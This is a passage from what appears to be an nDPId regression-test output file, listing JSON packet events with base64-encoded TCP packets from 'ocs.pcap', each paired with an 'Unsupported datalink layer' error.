layer","datalink":12,"packet_id":425,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806939} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":425,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIVQABABoDUwKi0ArL40DbC2QBQ64tGkd7szbeAEB8e27IAAAEBCAoANYqKRwYQYQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":426,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806993} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":426,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIWQABABoDTwKi0ArL40DbC2QBQ64tGkd7s0yOAEB9M1gAAAAEBCAoANYqPRwYQdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":427,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806996} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":427,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIXQABABoDSwKi0ArL40DbC2QBQ64tGkd7s2I+AEB950GYAAAEBCAoANYqQRwYQdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":428,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806997} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":428,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIYQABABoDRwKi0ArL40DbC2QBQ64tGkd7s3fuAEB+mys0AAAEBCAoANYqQRwYQdA=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":429,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807068} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":429,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIZQABABoDEwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+mCpoAAAEBCAoANYqXRwYQdAEBBQre7ONn3uzo0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":430,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807068} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":430,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIaQABABoDDwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+mBS4AAAEBCAoANYqXRwYQdAEBBQre7ONn3uzuPw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":431,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807137} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":431,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIbQABABoDCwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+m\/7oAAAEBCAoANYqeRwYQdAEBBQre7ONn3uzzqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":432,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807138} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":432,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIcQABABoDBwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+m+k4AAAEBCAoANYqeRwYQdAEBBQre7ONn3uz5Fw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":433,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807213} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":433,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIdQABABoDMwKi0ArL40DbC2QBQ64tGkd7s+ReAEB\/Trz0AAAEBCAoANYqlRwYQpg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":434,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807290} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":434,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIeQABABoC\/wKi0ArL40DbC2QBQ64tGkd7s+RewEB\/TuNAAAAEBCAoANYqtRwYQpgEBBQre7P6D3u0D7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":435,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807346} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":435,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIfQABABoC+wKi0ArL40DbC2QBQ64tGkd7s+RewEB\/Ts14AAAEBCAoANYqzRwYQpgEBBQre7P6D3u0JWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":436,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807424} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":436,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIgQABABoC9wKi0ArL40DbC2QBQ64tGkd7s+RewEB\/TresAAAEBCAoANYq6RwYQpgEBBQre7P6D3u0Oxw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":437,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807500} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":437,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIhQABABoDIwKi0ArL40DbC2QBQ64tGkd7tDseAECABmPsAAAEBCAoANYrCRwYQ7Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":438,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807501} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":438,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIiQABABoDHwKi0ArL40DbC2QBQ64tGkd7tFDOAECAuk2IAAAEBCAoANYrCRwYQ7Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":439,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807593} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":439,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIjQABABoC6wKi0ArL40DbC2QBQ64tGkd7tFDOwECAuW+QAAAEBCAoANYrLRwYQ7QEBBQre7R8L3u0kdw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":440,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807657} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":440,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIkQABABoC5wKi0ArL40DbC2QBQ64tGkd7tFDOwECAuVnEAAAEBCAoANYrSRwYQ7QEBBQre7R8L3u0p4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":441,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807726} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":441,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIlQABABoC4wKi0ArL40DbC2QBQ64tGkd7tGZ+wECBbUJYAAAEBCAoANYrZRwYRKAEBBQre7R8L3u0p4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":442,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807772} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":442,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMImQABABoC3wKi0ArL40DbC2QBQ64tGkd7tGZ+wECBbSyYAAAEBCAoANYrdRwYRKAEBBQre7R8L3u0vTw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":443,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807813} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":443,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMInQABABoDCwKi0ArL40DbC2QBQ64tGkd7tL0+AECCId3UAAAEBCAoANYrhRwYRRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":444,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807814} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":444,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIoQABABoDBwKi0ArL40DbC2QBQ64tGkd7tNLuAECC2cdsAAAEBCAoANYrhRwYRRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":445,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807857} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":445,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIpQABABoDAwKi0ArL40DbC2QBQ64tGkd7tOieAECDjbDIAAAEBCAoANYrmRwYRUA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":446,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807860} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":446,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIqQABABoC\/wKi0ArL40DbC2QBQ64tGkd7tP5OAECEQZpkAAAEBCAoANYrmRwYRUA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":447,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807863} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":447,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIrQABABoC+wKi0ArL40DbC2QBQ64tGkd7tRP+AECE9YQAAAAEBCAoANYrmRwYRUA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":448,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807936} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":448,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIsQABABoC9wKi0ArL40DbC2QBQ64tGkd7tSmuAECFrW1YAAAEBCAoANYrsRwYRWg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":449,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808335} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":449,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMItQABABoC8wKi0ArL40DbC2QBQ64tGkd7tT9eAECGYVT4AAAEBCAoANYsWRwYRrw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":450,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808412} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":450,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIuQABABoCvwKi0ArL40DbC2QBQ64tGkd7tT9ewECGYpnkAAAEBCAoANYsdRwYRrwEBBQre7Vqv3u1gGw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":451,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808414} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":451,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIvQABABoCuwKi0ArL40DbC2QBQ64tGkd7tT9ewECGYoQ0AAAEBCAoANYsdRwYRrwEBBQre7Vqv3u1lhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":452,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808486} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":452,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIwQABABoCtwKi0ArL40DbC2QBQ64tGkd7tT9ewECGYpnEAAAEBCAoANYslRwYRrwEBBQre7VVD3u1lhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":453,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808491} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":453,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIxQABABoCkwKi0ArL40DbC2QBQ64tGkd7tT9fQECGYAuMAAAEBCAoANYslRwYRrwEBBRLe7WAb3u1lh97tVUPe7WWH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":454,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808562} 
-00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":454,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIyQABABoCjwKi0ArL40DbC2QBQ64tGkd7tT9fQECGY7SsAAAEBCAoANYssRwYRrwEBBRLe7Wrz3u1wX97tVUPe7WWH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":455,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808735} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":455,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIzQABABoCqwKi0ArL40DbC2QBQ64tGkd7tZYewECHFb3kAAAEBCAoANYs+RwYSKQEBBQre7Wrz3u1wXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":456,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808795} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":456,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI0QABABoC1wKi0ArL40DbC2QBQ64tGkd7tcF+AECHyM6cAAAEBCAoANYtERwYSNg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":457,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808797} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":457,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI1QABABoC0wKi0ArL40DbC2QBQ64tGkd7tdcuAECIgLg0AAAEBCAoANYtERwYSNg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":458,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808847} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":458,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI2QABABoCzwKi0ArL40DbC2QBQ64tGkd7tezeAECJNKGEAAAEBCAoANYtJRwYSRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":459,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808848} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":459,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI3QABABoCywKi0ArL40DbC2QBQ64tGkd7tgKOAECJ6IsgAAAEBCAoANYtJRwYSRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":460,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808848} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":460,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI4QABABoCxwKi0ArL40DbC2QBQ64tGkd7thg+AECKnHS4AAAEBCAoANYtJRwYSRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":461,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808931} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI5QABABoCkwKi0ArL40DbC2QBQ64tGkd7thg+wECKnDNAAAAEBCAoANYtRRwYSRQEBBQre7Yt73u2Q5w=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":462,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809001} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":462,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMI6QABABoCbwKi0ArL40DbC2QBQ64tGkd7thg\/QECKn\/MkAAAEBCAoANYtYRwYSRQEBBRLe7ZZT3u2bv97ti3ve7ZDn"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":463,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809119} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":463,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI7QABABoCiwKi0ArL40DbC2QBQ64tGkd7tkOewECLV69IAAAEBCAoANYtjRwYSegEBBQre7ZZT3u2bvw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":464,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809207} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":464,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI8QABABoCtwKi0ArL40DbC2QBQ64tGkd7tm7+AECMCBqsAAAEBCAoANYttRwYSmQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":465,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809269} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":465,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI9QABABoCgwKi0ArL40DbC2QBQ64tGkd7tm7+wECMCyu4AAAEBCAoANYtzRwYSmQEBBQre7aEr3u2mlw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":466,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809358} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":466,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI+QABABoCfwKi0ArL40DbC2QBQ64tGkd7tm7+wECMCxXkAAAEBCAoANYt8RwYSmQEBBQre7aEr3u2sAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":467,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809553} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":467,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI\/QABABoCqwKi0ArL40DbC2QBQ64tGkd7trAOAECMv9cEAAAEBCAoANYuPRwYS7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":468,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809627} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":468,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJAQABABoCdwKi0ArL40DbC2QBQ64tGkd7trAOwECMvjqMAAAEBCAoANYuXRwYS7wEBBQre7bbb3u28Rw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":469,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809697} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":469,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJBQABABoCcwKi0ArL40DbC2QBQ64tGkd7tsW+wECNciN0AAAEBCAoANYueRwYTFQEBBQre7bbb3u28Rw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":470,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809699} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":470,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJCQABABoCnwKi0ArL40DbC2QBQ64tGkd7tvEeAECOK5O0AAAEBCAoANYueRwYTFQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":471,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809700} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":471,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJDQABABoCmwKi0ArL40DbC2QBQ64tGkd7twbOAECO331QAAAEBCAoANYueRwYTFQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":472,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809762} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":472,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJEQABABoClwKi0ArL40DbC2QBQ64tGkd7txx+AECPk2aMAAAEBCAoANYukRwYTJw=="} 
